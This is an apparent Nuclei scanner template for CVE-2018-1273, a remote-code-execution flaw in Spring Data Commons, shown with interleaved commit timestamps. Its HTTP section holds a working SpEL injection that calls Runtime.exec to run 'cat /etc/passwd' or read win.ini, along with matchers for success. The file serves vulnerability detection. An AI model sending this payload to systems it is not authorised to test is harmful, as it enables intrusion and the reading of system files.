2021-01-02 05:00:39 +00:00
id : CVE-2018-1273
2020-10-01 02:28:22 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Spring Data Commons - Remote Code Execution
2020-10-01 02:28:22 +00:00
author : dwisiswant0
severity : critical
description : |
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
and older unsupported versions, contain a property binder vulnerability
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
2022-01-25 19:38:53 +00:00
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2018-1273
2022-05-17 09:18:12 +00:00
- https://pivotal.io/security/cve-2018-1273
- http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
2023-07-11 19:49:27 +00:00
- https://www.oracle.com/security-alerts/cpujul2022.html
2024-01-29 17:11:14 +00:00
- https://github.com/2lambda123/SBSCAN
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1273
2023-11-20 05:10:39 +00:00
cwe-id : CWE-20,CWE-94
2024-04-08 11:34:33 +00:00
epss-score : 0.97515
epss-percentile : 0.99982
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : pivotal_software
product : spring_data_commons
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,vmware,rce,spring,kev,pivotal_software
2020-10-01 02:28:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-22 18:09:33 +00:00
- raw :
2020-10-01 02:28:22 +00:00
- |
POST /account HTTP/1.1
Host : {{Hostname}}
Connection : close
Content-Type : application/x-www-form-urlencoded
2023-07-20 07:43:09 +00:00
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}
2021-08-22 18:09:33 +00:00
payloads :
command :
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
2020-10-01 02:28:22 +00:00
matchers :
- type : regex
2023-05-24 05:26:09 +00:00
part : body
2020-10-01 02:28:22 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-10-01 02:28:22 +00:00
- "\\[(font|extension|file)s\\]"
2023-07-11 19:49:27 +00:00
condition : or
2024-01-30 06:46:18 +00:00
# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950